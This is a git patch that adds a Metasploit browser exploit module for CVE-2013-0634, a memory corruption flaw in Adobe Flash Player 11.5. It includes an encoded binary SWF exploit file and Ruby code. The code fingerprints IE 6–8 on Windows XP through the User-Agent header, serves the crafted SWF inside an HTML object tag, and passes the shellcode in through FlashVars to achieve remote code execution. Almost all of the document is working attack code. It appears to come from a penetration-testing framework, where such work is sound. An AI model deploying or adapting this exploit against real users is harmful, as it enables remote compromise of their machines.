From 766c408d86e666875356c83d35c9fdb029e9218d Mon Sep 17 00:00:00 2001
From: dukeBarman <dukebarman@gmail.com>
Date: Sat, 18 Jan 2014 11:07:11 -0500
Subject: [PATCH] Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption

---
 data/exploits/CVE-2013-0634/Main.swf          | Bin 0 -> 3312 bytes
 .../browser/adobe_flash_regex_value.rb        | 157 ++++++++++++++++++
 2 files changed, 157 insertions(+)
 create mode 100755 data/exploits/CVE-2013-0634/Main.swf
 create mode 100755 modules/exploits/windows/browser/adobe_flash_regex_value.rb

diff --git a/data/exploits/CVE-2013-0634/Main.swf b/data/exploits/CVE-2013-0634/Main.swf
new file mode 100755
index 0000000000000000000000000000000000000000..eee18c433691e114a1ba8cccb556ebc8ce821530
GIT binary patch
literal 3312
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

literal 0
HcmV?d00001

diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
new file mode 100755
index 0000000000..002e7265ed
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Adobe Flash Player 11.5 Remote Memory Corruption",
+      'Description'    => %q{
+         This module exploits a vulnerability found in the ActiveX component of Adobe
+        Flash Player before 11.5.502.149. By supplying a specially crafted swf file
+        with special regex value, it is possible to trigger an
+        memory corruption, which results in remote code execution under the context of the
+        user. This vulnerability has also been exploited in the wild in February 2013.
+        Please note in order to ensure reliability, the exploit is forced to modify 
+        your URIPATH parameter to less than 3 characters, which may cause possible
+        URIPATH collisions.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # malware sample
+          'Boris "dukeBarman" Ryutin' # msf exploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-0634' ],
+          [ 'OSVDB', '89936'],
+          [ 'BID', '57787'],
+          [ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
+          [ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
+          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
+          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
+          [ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
+        ],
+      'Payload'        =>
+        {
+          'Space' => 1024
+        },
+      'DefaultOptions'  =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+          'EXITFUNC'             => 'thread',
+          'HTTP::compression'    => 'gzip',
+          'HTTP::chunked'        => true,
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [ 'IE 6 on Windows XP SP3',    {'Rop' => nil } ],
+          [ 'IE 7 on Windows XP SP3',    {'Rop' => nil } ],
+          [ 'IE 8 on Windows XP SP3',    {'Rop' => nil } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Feb 8 2013",
+      'DefaultTarget'  => 0))
+  end
+
+  def get_payload(t)
+    p = payload.encoded
+    return p
+  end
+
+  def get_target(agent)
+    #If the user is already specified by the user, we'll just use that
+    return target if target.name != 'Automatic'
+
+    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
+      return targets[1]  #IE 6 on Windows XP SP3
+
+    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+      return targets[2]  #IE 7 on Windows XP SP3
+
+    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+      return targets[3]  #IE 8 on Windows XP SP3
+
+    else
+      return nil
+    end
+
+  end
+
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    my_target = get_target(agent)
+
+    # Avoid the attack if the victim doesn't have the same setup we're targeting
+    if my_target.nil?
+      print_error("Browser not supported: #{agent}")
+      send_not_found(cli)
+      return
+    end
+
+    print_status("Target selected: #{my_target.name}")
+    print_status("Client requesting: #{request.uri}")
+
+    swf_uri = "/#{@resource_name}.swf"
+    shellcode = get_payload(my_target).unpack("H*")[0]
+
+    # The SWF request itself
+    if request.uri =~ /\.swf$/
+      print_status("Sending SWF")
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
+      return
+    end
+
+    html = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="#{swf_uri}" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="his=#{shellcode}" />
+    <param name="Play" value="true" />
+    </object>
+    </body>
+    </html>
+    |
+
+    html = html.gsub(/^ {4}/, '')
+    print_status("Sending HTML")
+    send_response(cli, html, {'Content-Type'=>'text/html'})
+  end
+
+  def primer
+    hardcoded_uripath("/#{@resource_name}.swf")
+  end
+
+  def exploit
+    @swf = create_swf
+    @resource_name = Rex::Text.rand_text_alpha(5)
+    vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")
+
+    datastore['URIPATH'] = datastore['URIPATH'] || random_uri
+    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
+    datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3
+    print_warning("URIPATH set to #{datastore['URIPATH']}")
+    super
+  end
+
+  def create_swf
+    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "Main.swf" )
+    fd = ::File.open( path, "rb" )
+    swf = fd.read(fd.stat.size)
+    fd.close
+    return swf
+  end
+
+end